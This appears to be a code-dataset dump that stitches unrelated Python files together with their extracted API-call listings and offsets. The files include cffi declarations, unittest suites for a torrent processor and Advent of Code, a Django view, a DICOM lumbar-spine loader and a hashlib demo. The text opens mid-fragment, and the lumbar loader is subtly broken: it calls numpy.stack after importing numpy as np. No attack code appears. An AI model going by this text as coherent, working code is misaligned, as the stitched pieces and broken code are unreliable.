groupsig_blindsig_t* (*groupsig_blindsig_import_f)(unsigned char *source,\n\t\t\t\t\t\t\t uint32_t size);\n"""\n )\n', (811, 938), False, 'from pygroupsig.common_build import ffibuilder\n'), ((930, 1043), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef char* (*groupsig_blindsig_to_string_f)(groupsig_blindsig_t *blindsig);\n"""'], {}), '(\n """\ntypedef char* (*groupsig_blindsig_to_string_f)(groupsig_blindsig_t *blindsig);\n"""\n )\n', (945, 1043), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1035, 1378), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef struct {\nuint8_t scheme;\ngroupsig_blindsig_init_f init;\ngroupsig_blindsig_free_f free;\ngroupsig_blindsig_copy_f copy;\ngroupsig_blindsig_get_size_f get_size;\ngroupsig_blindsig_export_f gexport;\ngroupsig_blindsig_import_f gimport;\ngroupsig_blindsig_to_string_f to_string;\n} groupsig_blindsig_handle_t; \n"""'], {}), '(\n """\ntypedef struct {\nuint8_t scheme;\ngroupsig_blindsig_init_f init;\ngroupsig_blindsig_free_f free;\ngroupsig_blindsig_copy_f copy;\ngroupsig_blindsig_get_size_f get_size;\ngroupsig_blindsig_export_f gexport;\ngroupsig_blindsig_import_f 
gimport;\ngroupsig_blindsig_to_string_f to_string;\n} groupsig_blindsig_handle_t; \n"""\n )\n', (1050, 1378), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1370, 1488), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nconst groupsig_blindsig_handle_t* groupsig_blindsig_handle_from_code(uint8_t code);\n"""'], {}), '(\n """\nconst groupsig_blindsig_handle_t* groupsig_blindsig_handle_from_code(uint8_t code);\n"""\n )\n', (1385, 1488), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1480, 1568), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ngroupsig_blindsig_t* groupsig_blindsig_init(uint8_t code);\n"""'], {}), '(\n """\ngroupsig_blindsig_t* groupsig_blindsig_init(uint8_t code);\n""")\n', (1495, 1568), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1565, 1643), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nint groupsig_blindsig_free(groupsig_blindsig_t *sig);\n"""'], {}), '("""\nint groupsig_blindsig_free(groupsig_blindsig_t *sig);\n""")\n', (1580, 1643), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1645, 1759), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nint groupsig_blindsig_copy(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);\n"""'], {}), '(\n """\nint groupsig_blindsig_copy(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);\n"""\n )\n', (1660, 1759), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1751, 1838), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nint groupsig_blindsig_get_size(groupsig_blindsig_t *sig);\n"""'], {}), '(\n """\nint groupsig_blindsig_get_size(groupsig_blindsig_t *sig);\n""")\n', (1766, 1838), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1835, 1967), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nint groupsig_blindsig_export(\nunsigned char **bytes, \nuint32_t *size, \ngroupsig_blindsig_t *sig);\n"""'], {}), '(\n """\nint groupsig_blindsig_export(\nunsigned char **bytes, \nuint32_t *size, \ngroupsig_blindsig_t *sig);\n"""\n )\n', (1850, 1967), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1959, 2095), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ngroupsig_blindsig_t* groupsig_blindsig_import(\nuint8_t code, \nunsigned char *source, \nuint32_t size);\n"""'], {}), '(\n """\ngroupsig_blindsig_t* groupsig_blindsig_import(\nuint8_t code, \nunsigned char *source, \nuint32_t size);\n"""\n )\n', (1974, 2095), False, 'from pygroupsig.common_build import ffibuilder\n'), ((2087, 2177), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nchar* groupsig_blindsig_to_string(groupsig_blindsig_t *sig);\n"""'], {}), '(\n """\nchar* groupsig_blindsig_to_string(groupsig_blindsig_t *sig);\n""")\n', (2102, 2177), False, 'from pygroupsig.common_build import ffibuilder\n')]
|
import unittest
from os import listdir
from os.path import basename, dirname, realpath
from shutil import copy2
from tempfile import NamedTemporaryFile, mkdtemp
from trdone.actions import NoAction, CopyAction, UnrarAction
from trdone.processor import Processor
class TestProcessor(unittest.TestCase):
def test_process_file_when_it_is_a_directory(self):
processor = Processor(None, None)
source = mkdtemp()
action = processor._process_file(source, None)
        self.assertEqual(action, NoAction(source, None))
def test_process_file_when_it_is_a_file(self):
destination = 'destination'
processor = Processor(None, destination)
torrent = NamedTemporaryFile()
action = processor._process_file(torrent.name, destination)
        self.assertEqual(action, CopyAction(torrent.name, destination))
def test_process_file_when_it_is_an_archive(self):
destination = 'destination'
processor = Processor(None, destination)
torrent = NamedTemporaryFile(suffix='.rar')
action = processor._process_file(torrent.name, destination)
        self.assertEqual(action, UnrarAction(torrent.name, destination))
def test_process(self):
destination = mkdtemp()
torrent = mkdtemp()
ignored_dir = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
rar_file = NamedTemporaryFile(suffix='.rar', dir=torrent)
processor = Processor(torrent, destination)
processor.process()
self.assertTrue(len(processor.actions) == 3)
new_torrent_dir = self._build_path(destination, torrent)
self.assertTrue(NoAction(ignored_dir, new_torrent_dir) in processor.actions)
self.assertTrue(CopyAction(some_file.name, new_torrent_dir) in processor.actions)
self.assertTrue(UnrarAction(rar_file.name, new_torrent_dir) in processor.actions)
def test_process_when_paths_are_mapped(self):
destination = mkdtemp()
torrent_base = mkdtemp()
torrent = mkdtemp(dir=torrent_base)
path_mapping = {'some_base': torrent_base}
ignored_dir = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
rar_file = NamedTemporaryFile(suffix='.rar', dir=torrent)
processor = Processor(self._build_path('some_base', basename(torrent)), destination, path_mapping)
processor.process()
self.assertTrue(len(processor.actions) == 3)
new_torrent_dir = self._build_path(destination, torrent)
self.assertTrue(NoAction(ignored_dir, new_torrent_dir) in processor.actions)
self.assertTrue(CopyAction(some_file.name, new_torrent_dir) in processor.actions)
self.assertTrue(UnrarAction(rar_file.name, new_torrent_dir) in processor.actions)
def test_execute(self):
pwd = dirname(realpath(__file__))
destination = mkdtemp()
torrent = mkdtemp()
copy2(self._build_path(pwd, 'file.rar'), torrent)
_ = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
processor = Processor(torrent, destination)
processor.process()
processor.execute()
new_torrent_dir = listdir(self._build_path(destination, torrent))
self.assertTrue(basename(torrent) in listdir(destination))
self.assertTrue(basename(some_file.name) in new_torrent_dir)
self.assertTrue('file.txt' in new_torrent_dir)
self.assertTrue('file.rar' not in new_torrent_dir)
@staticmethod
def _build_path(destination, torrent):
return destination + '/' + basename(torrent)
|
[
"tempfile.NamedTemporaryFile",
"os.path.basename",
"trdone.actions.UnrarAction",
"trdone.processor.Processor",
"os.path.realpath",
"tempfile.mkdtemp",
"trdone.actions.NoAction",
"os.listdir",
"trdone.actions.CopyAction"
] |
[((380, 401), 'trdone.processor.Processor', 'Processor', (['None', 'None'], {}), '(None, None)\n', (389, 401), False, 'from trdone.processor import Processor\n'), ((419, 428), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (426, 428), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((651, 679), 'trdone.processor.Processor', 'Processor', (['None', 'destination'], {}), '(None, destination)\n', (660, 679), False, 'from trdone.processor import Processor\n'), ((698, 718), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {}), '()\n', (716, 718), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((973, 1001), 'trdone.processor.Processor', 'Processor', (['None', 'destination'], {}), '(None, destination)\n', (982, 1001), False, 'from trdone.processor import Processor\n'), ((1020, 1053), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'suffix': '""".rar"""'}), "(suffix='.rar')\n", (1038, 1053), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1248, 1257), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (1255, 1257), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1276, 1285), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (1283, 1285), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1308, 1350), 'tempfile.mkdtemp', 'mkdtemp', ([], {'prefix': '"""ignored_dir"""', 'dir': 'torrent'}), "(prefix='ignored_dir', dir=torrent)\n", (1315, 1350), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1371, 1422), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'prefix': '"""some_file"""', 'dir': 'torrent'}), "(prefix='some_file', dir=torrent)\n", (1389, 1422), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1442, 1488), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'suffix': '""".rar"""', 'dir': 'torrent'}), "(suffix='.rar', dir=torrent)\n", (1460, 1488), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1509, 1540), 'trdone.processor.Processor', 'Processor', (['torrent', 'destination'], {}), '(torrent, destination)\n', (1518, 1540), False, 'from trdone.processor import Processor\n'), ((2027, 2036), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (2034, 2036), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2060, 2069), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (2067, 2069), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2088, 2113), 'tempfile.mkdtemp', 'mkdtemp', ([], {'dir': 'torrent_base'}), '(dir=torrent_base)\n', (2095, 2113), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2187, 2229), 'tempfile.mkdtemp', 'mkdtemp', ([], {'prefix': '"""ignored_dir"""', 'dir': 'torrent'}), "(prefix='ignored_dir', dir=torrent)\n", (2194, 2229), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2250, 2301), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'prefix': '"""some_file"""', 'dir': 'torrent'}), "(prefix='some_file', dir=torrent)\n", (2268, 2301), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2321, 2367), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'suffix': '""".rar"""', 'dir': 'torrent'}), "(suffix='.rar', dir=torrent)\n", (2339, 2367), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2981, 2990), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (2988, 2990), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((3009, 3018), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (3016, 3018), False, 'from tempfile import 
NamedTemporaryFile, mkdtemp\n'), ((3089, 3131), 'tempfile.mkdtemp', 'mkdtemp', ([], {'prefix': '"""ignored_dir"""', 'dir': 'torrent'}), "(prefix='ignored_dir', dir=torrent)\n", (3096, 3131), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((3152, 3203), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'prefix': '"""some_file"""', 'dir': 'torrent'}), "(prefix='some_file', dir=torrent)\n", (3170, 3203), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((3258, 3289), 'trdone.processor.Processor', 'Processor', (['torrent', 'destination'], {}), '(torrent, destination)\n', (3267, 3289), False, 'from trdone.processor import Processor\n'), ((519, 541), 'trdone.actions.NoAction', 'NoAction', (['source', 'None'], {}), '(source, None)\n', (527, 541), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((822, 859), 'trdone.actions.CopyAction', 'CopyAction', (['torrent.name', 'destination'], {}), '(torrent.name, destination)\n', (832, 859), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((1157, 1195), 'trdone.actions.UnrarAction', 'UnrarAction', (['torrent.name', 'destination'], {}), '(torrent.name, destination)\n', (1168, 1195), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((2939, 2957), 'os.path.realpath', 'realpath', (['__file__'], {}), '(__file__)\n', (2947, 2957), False, 'from os.path import basename, dirname, realpath\n'), ((3769, 3786), 'os.path.basename', 'basename', (['torrent'], {}), '(torrent)\n', (3777, 3786), False, 'from os.path import basename, dirname, realpath\n'), ((1713, 1751), 'trdone.actions.NoAction', 'NoAction', (['ignored_dir', 'new_torrent_dir'], {}), '(ignored_dir, new_torrent_dir)\n', (1721, 1751), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((1798, 1841), 'trdone.actions.CopyAction', 'CopyAction', (['some_file.name', 'new_torrent_dir'], {}), '(some_file.name, new_torrent_dir)\n', (1808, 1841), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((1888, 1931), 'trdone.actions.UnrarAction', 'UnrarAction', (['rar_file.name', 'new_torrent_dir'], {}), '(rar_file.name, new_torrent_dir)\n', (1899, 1931), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((2428, 2445), 'os.path.basename', 'basename', (['torrent'], {}), '(torrent)\n', (2436, 2445), False, 'from os.path import basename, dirname, realpath\n'), ((2647, 2685), 'trdone.actions.NoAction', 'NoAction', (['ignored_dir', 'new_torrent_dir'], {}), '(ignored_dir, new_torrent_dir)\n', (2655, 2685), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((2732, 2775), 'trdone.actions.CopyAction', 'CopyAction', (['some_file.name', 'new_torrent_dir'], {}), '(some_file.name, new_torrent_dir)\n', (2742, 2775), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((2822, 2865), 'trdone.actions.UnrarAction', 'UnrarAction', (['rar_file.name', 'new_torrent_dir'], {}), '(rar_file.name, new_torrent_dir)\n', (2833, 2865), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((3446, 3463), 'os.path.basename', 'basename', (['torrent'], {}), '(torrent)\n', (3454, 3463), False, 'from os.path import basename, dirname, realpath\n'), ((3467, 3487), 'os.listdir', 'listdir', (['destination'], {}), '(destination)\n', (3474, 3487), False, 'from os import listdir\n'), ((3513, 3537), 'os.path.basename', 'basename', (['some_file.name'], {}), '(some_file.name)\n', (3521, 3537), False, 'from os.path import 
basename, dirname, realpath\n')]
|
import os
from pathlib import Path
from typing import List
from aoc_2018.day_3.python.day3_puzzle1 import (
Claim,
find_square_inches_with_overlapping_claims,
parse_claim,
)
def get_input(input_file_name: str) -> List[Claim]:
input_file_path: str = os.path.join(Path(os.path.dirname(__file__)).parent, input_file_name)
claims: List[Claim] = []
with open(input_file_path) as input_file:
claims = [parse_claim(claim_str) for claim_str in input_file]
return claims
def test_find_square_inches_with_multiple_claims_simple() -> None:
assert find_square_inches_with_overlapping_claims(get_input("puzzle1_simple_input.txt")) == 4
def test_find_square_inches_with_multiple_claims_complex() -> None:
assert find_square_inches_with_overlapping_claims(get_input("puzzle_input.txt")) == 107663
|
[
"aoc_2018.day_3.python.day3_puzzle1.parse_claim",
"os.path.dirname"
] |
[((433, 455), 'aoc_2018.day_3.python.day3_puzzle1.parse_claim', 'parse_claim', (['claim_str'], {}), '(claim_str)\n', (444, 455), False, 'from aoc_2018.day_3.python.day3_puzzle1 import Claim, find_square_inches_with_overlapping_claims, parse_claim\n'), ((286, 311), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (301, 311), False, 'import os\n')]
|
import os
for i in range(28):
print("Test case: ", i)
os.system(f"echo {i} | ./a.out | grep \"Enter\"")
|
[
"os.system"
] |
[((58, 105), 'os.system', 'os.system', (['f"""echo {i} | ./a.out | grep "Enter\\""""'], {}), '(f\'echo {i} | ./a.out | grep "Enter"\')\n', (67, 105), False, 'import os\n')]
|
# coding=utf-8
import traceback
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import permission_required
from django.contrib.messages.views import SuccessMessageMixin
from django.core.urlresolvers import reverse
from django.views.generic.edit import CreateView
from modules.employee_management.employee_info.models import Employee
from modules.share_module.permissionMixin import class_view_decorator
from modules.social_security.reduction_info.models import Reduction
@class_view_decorator(login_required)
@class_view_decorator(permission_required('reduction_info.add_reduction', raise_exception=True))
class ReductionCreate(SuccessMessageMixin, CreateView):
model = Reduction
template_name = "base/document_edit.html"
fields = ["emplyid", "remark", "remark1", "remark2"]
    success_message = u"%(emplyid)s created successfully"
def get_success_url(self):
self.url = reverse('reduction_info:reduction_list', args=())
referrer = self.request.POST.get("referrer", "")
# if referrer:
# self.url = referrer
_addanother = self.request.POST.get("_addanother", "")
if _addanother:
self.url = reverse('reduction_info:reduction_add')
return self.url
# ๅขๅ ่ฟๅๅๆฐ
def get_context_data(self, **kwargs):
context = super(ReductionCreate, self).get_context_data(**kwargs)
context["form_content"] = u"ๆฐๅขๅๅไฟกๆฏ"
referrer = self.request.META.get('HTTP_REFERER', "")
context["referrer"] = referrer
return context
def form_valid(self, form):
        # Verify the current logged-in user; block entry when they are not the principal of the project being entered.
try:
login_user = self.request.user
            emplyid = self.request.POST.get("emplyid", 0)  # employee ID
if not emplyid:
                messages.warning(self.request, u"Please select an employee ID that you are responsible for")
return super(ReductionCreate, self).form_invalid(form)
emp_obj = Employee.objects.filter(id=emplyid)
principal = ""
if emp_obj.exists():
principal = emp_obj[0].project_name.principal
if login_user != principal:
                messages.warning(self.request, u"Please select an employee ID that you are responsible for")
return super(ReductionCreate, self).form_invalid(form)
        except Exception:
            traceback.print_exc()
return super(ReductionCreate, self).form_valid(form)
|
[
"traceback.print_exc",
"django.core.urlresolvers.reverse",
"django.contrib.auth.decorators.permission_required",
"modules.employee_management.employee_info.models.Employee.objects.filter",
"modules.share_module.permissionMixin.class_view_decorator",
"django.contrib.messages.warning"
] |
[((558, 594), 'modules.share_module.permissionMixin.class_view_decorator', 'class_view_decorator', (['login_required'], {}), '(login_required)\n', (578, 594), False, 'from modules.share_module.permissionMixin import class_view_decorator\n'), ((617, 690), 'django.contrib.auth.decorators.permission_required', 'permission_required', (['"""reduction_info.add_reduction"""'], {'raise_exception': '(True)'}), "('reduction_info.add_reduction', raise_exception=True)\n", (636, 690), False, 'from django.contrib.auth.decorators import permission_required\n'), ((945, 994), 'django.core.urlresolvers.reverse', 'reverse', (['"""reduction_info:reduction_list"""'], {'args': '()'}), "('reduction_info:reduction_list', args=())\n", (952, 994), False, 'from django.core.urlresolvers import reverse\n'), ((1178, 1217), 'django.core.urlresolvers.reverse', 'reverse', (['"""reduction_info:reduction_add"""'], {}), "('reduction_info:reduction_add')\n", (1185, 1217), False, 'from django.core.urlresolvers import reverse\n'), ((1801, 1836), 'modules.employee_management.employee_info.models.Employee.objects.filter', 'Employee.objects.filter', ([], {'id': 'emplyid'}), '(id=emplyid)\n', (1824, 1836), False, 'from modules.employee_management.employee_info.models import Employee\n'), ((1678, 1727), 'django.contrib.messages.warning', 'messages.warning', (['self.request', 'u"""Please select an employee ID that you are responsible for"""'], {}), "(self.request, u'Please select an employee ID that you are responsible for')\n", (1694, 1727), False, 'from django.contrib import messages\n'), ((1964, 2013), 'django.contrib.messages.warning', 'messages.warning', (['self.request', 'u"""Please select an employee ID that you are responsible for"""'], {}), "(self.request, u'Please select an employee ID that you are responsible for')\n", (1980, 2013), False, 'from django.contrib import messages\n'), ((2086, 2107), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2105, 2107), False, 'import traceback\n')]
|
import json
import os
import SimpleITK as sitk
import numpy as np
import pydicom
from ltr.admin.environment import env_settings
from ltr.data.processing_utils import str_analyse
from ltr.dataset.base_dataset import BaseDataset
from pydoctor.evaluation import Study
from pydoctor.evaluation.data import StudyList
def _read_file(path):
with open(path, 'r') as f:
json_file = json.loads(f.read())
return json_file
class Lumbar3d(BaseDataset):
"""
    The Lumbar dataset from the official TianChi competition,
    organized as follows.
-lumbar
-lumbar_testA50
-study...
-lumbar_train150
-study...
-lumbar_train51
-study...
lumbar_train150_annotation.json
lumbar_train51_annotation.json
"""
def __init__(self, root=None, split='train'):
"""
        args:
            :param root: path to the lumbar dataset.
            :param split: split name, one of 'train', 'val', 'testA', 'testB'.
"""
root = env_settings().lumbar_dir if root is None else root
super().__init__('lumbar', root)
# dataset split for competition.
if split == 'train':
self.studies_path = os.path.join(root, 'DatasetA','lumbar_train150')
self.anno_path = os.path.join(root, 'DatasetA','lumbar_train150_annotation.json')
self.anno_meta = self._load_anno(self.anno_path)
elif split == 'val':
self.studies_path = os.path.join(root, 'DatasetA','lumbar_train51')
self.anno_path = os.path.join(root, 'DatasetA','lumbar_train51_annotation.json')
self.anno_meta = self._load_anno(self.anno_path)
elif split == 'testA':
self.studies_path = os.path.join(root,'datasetA','lumbar_testA50')
elif split == 'testB':
self.studies_path = os.path.join(root, 'datasetB', 'lumbar_testB50')
else:
            raise ValueError('Unknown split name.')
# All folders inside the root.
self.study_list = self._get_study_list()
self.body_id = {'L1':0,'L2':1,'L3':2,'L4':3,'L5':4}
self.body_class = {'V1':0,'V2':1}
self.disc_id = {'T12-L1':0,'L1-L2':1,'L2-L3':2,'L3-L4':3,'L4-L5':4,'L5-S1':5}
self.disc_class = {'V1':0,'V2':1,'V3':2,'V4':3,'V5':4}
def _get_study_list(self):
return os.listdir(self.studies_path)
def get_name(self):
return 'lumbar'
def _get_study_path(self, std_id):
return os.path.join(self.studies_path, self.study_list[std_id])
def _get_key_image_info(self, folder,frame_num=3):
reader = sitk.ImageSeriesReader()
file_path = os.path.join(folder, os.listdir(folder)[0])
study_uid = pydicom.read_file(file_path).get(0x0020000d).value
study_meta = self.anno_meta[str(study_uid)]
dicom_path_list = reader.GetGDCMSeriesFileNames(folder, study_meta['seriesUid'])
dicom_slice = [[pydicom.read_file(file), file] for file in dicom_path_list]
dicom_slice.sort(key=lambda x: float(x[0].ImagePositionPatient[0]))
data_path = dicom_slice[len(dicom_path_list) // 2][1]
        middle_index = study_meta['point'][0]['zIndex']
        frame_list = []
        for dcm_path in range(middle_index - frame_num // 2, middle_index + frame_num // 2 + 1, 1):
frame_list.append(np.squeeze(sitk.GetArrayFromImage(sitk.ReadImage(dicom_slice[dcm_path][1]))))
key_image = numpy.stack(frame_list,axis=0)
key_image = np.uint8((key_image - key_image.min()) / (key_image.max() - key_image.min()) * 255.0)
return key_image, study_meta['point']
def _load_anno(self, anno_path):
anno_list = _read_file(anno_path)
anno_dict = {}
for anno in anno_list:
tmp_dict = {anno['studyUid']: {'seriesUid': anno['data'][0]['seriesUid'],
'instanceUid': anno['data'][0]['instanceUid'],
'point': anno['data'][0]['annotation'][0]['data']['point']}}
anno_dict.update(tmp_dict)
return anno_dict
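    # Illustrative shape of one anno_dict entry (inferred from the fields used
    # above and in _deal_point_dict; not part of the original code):
    # {'<studyUid>': {'seriesUid': '...', 'instanceUid': '...',
    #                 'point': [{'coord': [x, y], 'zIndex': z,
    #                            'tag': {'identification': 'L1', 'vertebra': 'v2'}}, ...]}}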
def _deal_point_dict(self,point_list):
body_dict,disc_dict = {},{}
for ann in point_list:
coord = ann.get('coord',None)
identification = ann['tag'].get('identification',None)
if identification in self.body_id:
class_num = self.body_class[str_analyse(ann['tag'].get('vertebra','v1').upper())]
body_dict.update({identification:{'coord':coord,'class_num':class_num}})
elif identification in self.disc_id:
class_num = self.disc_class[str_analyse(ann['tag'].get('disc','v1').upper())]
disc_dict.update({identification:{'coord':coord,'class_num':class_num}})
return body_dict, disc_dict
def get_frames(self, std_id, frame_num=5,anno=None):
dicom_folder = self._get_study_path(std_id)
key_frame,point_list = self._get_key_image_info(dicom_folder)
body_dict, disc_dict = self._deal_point_dict(point_list)
return key_frame, body_dict, disc_dict
def get_study_list(self):
return StudyList([self._construct_study(s) for s in self.study_list])
def _construct_study(self,study_name):
study_folder_path = os.path.join(self.studies_path,study_name)
# series_ids = sitk.ImageSeriesReader.GetGDCMSeriesIDs(study_folder_path)
# for id in series_ids:
file_list = [os.path.join(study_folder_path,i) for i in os.listdir(study_folder_path)]
dicom_slice = [[pydicom.read_file(file),file]for file in file_list]
dicom_slice.sort(key=lambda x:float(x[0].ImagePositionPatient[0]))
data_path = dicom_slice[len(file_list)//2][1]
return Study(name=study_name,dataset='lumbar_test',frame_path=data_path,index=len(file_list)//2)
|
[
"numpy.stack",
"pydicom.read_file",
"SimpleITK.ReadImage",
"ltr.admin.environment.env_settings",
"os.path.join",
"os.listdir",
"SimpleITK.ImageSeriesReader"
] |
[((2384, 2413), 'os.listdir', 'os.listdir', (['self.studies_path'], {}), '(self.studies_path)\n', (2394, 2413), False, 'import os\n'), ((2518, 2574), 'os.path.join', 'os.path.join', (['self.studies_path', 'self.study_list[std_id]'], {}), '(self.studies_path, self.study_list[std_id])\n', (2530, 2574), False, 'import os\n'), ((2678, 2702), 'SimpleITK.ImageSeriesReader', 'sitk.ImageSeriesReader', ([], {}), '()\n', (2700, 2702), True, 'import SimpleITK as sitk\n'), ((3510, 3541), 'numpy.stack', 'numpy.stack', (['frame_list'], {'axis': '(0)'}), '(frame_list, axis=0)\n', (3521, 3541), False, 'import numpy\n'), ((5368, 5411), 'os.path.join', 'os.path.join', (['self.studies_path', 'study_name'], {}), '(self.studies_path, study_name)\n', (5380, 5411), False, 'import os\n'), ((1243, 1292), 'os.path.join', 'os.path.join', (['root', '"""DatasetA"""', '"""lumbar_train150"""'], {}), "(root, 'DatasetA', 'lumbar_train150')\n", (1255, 1292), False, 'import os\n'), ((1321, 1386), 'os.path.join', 'os.path.join', (['root', '"""DatasetA"""', '"""lumbar_train150_annotation.json"""'], {}), "(root, 'DatasetA', 'lumbar_train150_annotation.json')\n", (1333, 1386), False, 'import os\n'), ((5546, 5580), 'os.path.join', 'os.path.join', (['study_folder_path', 'i'], {}), '(study_folder_path, i)\n', (5558, 5580), False, 'import os\n'), ((1047, 1061), 'ltr.admin.environment.env_settings', 'env_settings', ([], {}), '()\n', (1059, 1061), False, 'from ltr.admin.environment import env_settings\n'), ((1508, 1556), 'os.path.join', 'os.path.join', (['root', '"""DatasetA"""', '"""lumbar_train51"""'], {}), "(root, 'DatasetA', 'lumbar_train51')\n", (1520, 1556), False, 'import os\n'), ((1585, 1649), 'os.path.join', 'os.path.join', (['root', '"""DatasetA"""', '"""lumbar_train51_annotation.json"""'], {}), "(root, 'DatasetA', 'lumbar_train51_annotation.json')\n", (1597, 1649), False, 'import os\n'), ((2744, 2762), 'os.listdir', 'os.listdir', (['folder'], {}), '(folder)\n', (2754, 2762), False, 'import os\n'), ((3003, 3026), 'pydicom.read_file', 'pydicom.read_file', (['file'], {}), '(file)\n', (3020, 3026), False, 'import pydicom\n'), ((5589, 5618), 'os.listdir', 'os.listdir', (['study_folder_path'], {}), '(study_folder_path)\n', (5599, 5618), False, 'import os\n'), ((5644, 5667), 'pydicom.read_file', 'pydicom.read_file', (['file'], {}), '(file)\n', (5661, 5667), False, 'import pydicom\n'), ((1773, 1821), 'os.path.join', 'os.path.join', (['root', '"""datasetA"""', '"""lumbar_testA50"""'], {}), "(root, 'datasetA', 'lumbar_testA50')\n", (1785, 1821), False, 'import os\n'), ((2787, 2815), 'pydicom.read_file', 'pydicom.read_file', (['file_path'], {}), '(file_path)\n', (2804, 2815), False, 'import pydicom\n'), ((1883, 1931), 'os.path.join', 'os.path.join', (['root', '"""datasetB"""', '"""lumbar_testB50"""'], {}), "(root, 'datasetB', 'lumbar_testB50')\n", (1895, 1931), False, 'import os\n'), ((3446, 3486), 'SimpleITK.ReadImage', 'sitk.ReadImage', (['dicom_slice[dcm_path][1]'], {}), '(dicom_slice[dcm_path][1])\n', (3460, 3486), True, 'import SimpleITK as sitk\n')]
|
import hashlib
# initialize a string (named `text` to avoid shadowing the built-in `str`)
text = "Crypto"
# encode the string
encoded_str = text.encode()
# create sha-2 hash objects initialized with the encoded string
hash_obj_sha224 = hashlib.sha224(encoded_str) # SHA224
hash_obj_sha256 = hashlib.sha256(encoded_str) # SHA256
hash_obj_sha384 = hashlib.sha384(encoded_str) # SHA384
hash_obj_sha512 = hashlib.sha512(encoded_str) # SHA512
# print
print("\nSHA224 Hash: ", hash_obj_sha224.hexdigest())
print("\nSHA256 Hash: ", hash_obj_sha256.hexdigest())
print("\nSHA384 Hash: ", hash_obj_sha384.hexdigest())
print("\nSHA512 Hash: ", hash_obj_sha512.hexdigest())
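# Note (general hashlib behavior): hexdigest() returns twice as many hex
# characters as the digest size in bytes -- 56 for SHA224, 64 for SHA256,
# 96 for SHA384 and 128 for SHA512.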
|
[
"hashlib.sha256",
"hashlib.sha224",
"hashlib.sha512",
"hashlib.sha384"
] |
